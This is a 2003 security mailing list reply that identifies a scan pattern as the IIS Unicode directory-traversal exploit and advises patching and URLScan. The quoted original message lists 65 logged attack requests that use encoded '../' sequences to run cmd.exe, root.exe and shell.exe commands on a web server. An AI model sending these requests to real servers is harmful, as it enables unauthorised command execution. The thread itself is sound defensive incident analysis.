Security Incidents mailing list archives
Re: New attack or old Vulnerability Scanner?
From: jac <johann.coulon () sulzer com>
Date: 29 Apr 2003 20:21:49 -0000
In-Reply-To: <20030424234343.8177.qmail () www securityfocus com> Hi Mark, The pattern is the UNICODE Exploit. Depending on the HTTP Response 200 (Success) or 404 (Not Found) you may be affected by this exploit when running a unpatched Version of IIS 4.0/5.0. Have a closer look at your Webserver Logfiles. If you don't see the HTTP Response you may prefer to configure the logfile output with extened logging options for future analysis. You can take good prevention from this and several other attacks by applying all security patches, using Microsoft's URLScan and do some hardening on your internet server(s). Johann Coulon
Received: (qmail 25276 invoked from network); 25 Apr 2003 18:30:44 -0000 Received: from outgoing3.securityfocus.com (205.206.231.27) by mail.securityfocus.com with SMTP; 25 Apr 2003 18:30:44 -0000 Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
by outgoing3.securityfocus.com (Postfix) with QMQP id BBDE1A311B; Fri, 25 Apr 2003 12:35:34 -0600 (MDT) Mailing-List: contact incidents-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <incidents.list-id.securityfocus.com> List-Post: <mailto:incidents () securityfocus com> List-Help: <mailto:incidents-help () securityfocus com> List-Unsubscribe: <mailto:incidents-unsubscribe () securityfocus com> List-Subscribe: <mailto:incidents-subscribe () securityfocus com> Delivered-To: mailing list incidents () securityfocus com Delivered-To: moderator for incidents () securityfocus com Received: (qmail 29971 invoked from network); 24 Apr 2003 23:24:29 -0000 Date: 24 Apr 2003 23:43:43 -0000 Message-ID: <20030424234343.8177.qmail () www securityfocus com> Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: Mark Embrich <mark_embrich () yahoo com> To: incidents () securityfocus com Subject: New attack or old Vulnerability Scanner? Hello, Does anyone recognize this pattern of a TCP connect scan, then 65 GETs? Note that it also included: "User-Agent:.Mozilla/3.0. (compatible;.Indy.Library)...." For which my googling tells me that this attack/scanner is probably built using Borland Delphi/C++ Builder suite. I've so far received 3 of these from 2 different IP addresses. The first two were from a Comcast cable user. The last was from a Cox Communications IP. Thanks, Mark Embrich 0. Scan TCP 80 1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 3. GET./_vti_bin/.%252e/.%252e/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%% 35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 8. GET./_vti_bin/..%255c..%255c..%255c..%255c..% 255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..% 252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 21. GET./msadc/.%252e/.%252e/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 23. GET./msadc/..%%35%63../..%%35%63../..%%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 24. GET./MSADC/..%%35c..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 25. GET./msadc/..%%35c../..%%35c../..%% 35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35% 63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 28. GET./msadc/..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 29. GET./msadc/..%255c../..%255c../..% 255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 30. GET./msadc/..%c0%af../..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 31. GET./msadc/..%c0%af../..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/% af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1.. 33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1.. 34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1.. 35. GET./PBServer/..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 36. GET./PBServer/..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 37. GET./PBServer/..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 38. GET./PBServer/..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 39. GET./Rpc/..%%35%63..%%35%63..%%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 40. GET./Rpc/..%%35c..%%35c..%% 35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 41. GET./Rpc/..%25%35%63..%25%35%63..%25%35% 63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 42. GET./Rpc/..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 43. GET./samples/..%255c..%255c..%255c..%255c..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 46. GET./scripts/.%252e/.% 252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 47. GET./scripts/..%252f..%252f..%252f..% 252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 48. GET./scripts/..%255c..% 255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0% AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1% 1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1% 9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 60. GET./scripts/..%e0%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 61. GET./scripts/..%f0%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 62. GET./scripts/..%f8%80%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 63. GET./scripts/..%fc%80%80%80%80% af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. 64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1.. 65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1.. --------------------------------------------------------------------------
--
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by
professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no
vendor
sales pitches. Deadline for the best rates is April 25. Register today
to
ensure your place. http://www.securityfocus.com/BlackHat-incidents --------------------------------------------------------------------------
--
---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
Current thread:
- New attack or old Vulnerability Scanner? Mark Embrich (Apr 25)
- RE: New attack or old Vulnerability Scanner? Keith (Apr 28)
- <Possible follow-ups>
- RE: New attack or old Vulnerability Scanner? James C. Slora, Jr. (Apr 28)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 28)
- Re: New attack or old Vulnerability Scanner? rhandwerker (Apr 28)
- Re: New attack or old Vulnerability Scanner? jac (Apr 29)
- Re: New attack or old Vulnerability Scanner? Mark Embrich (Apr 29)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)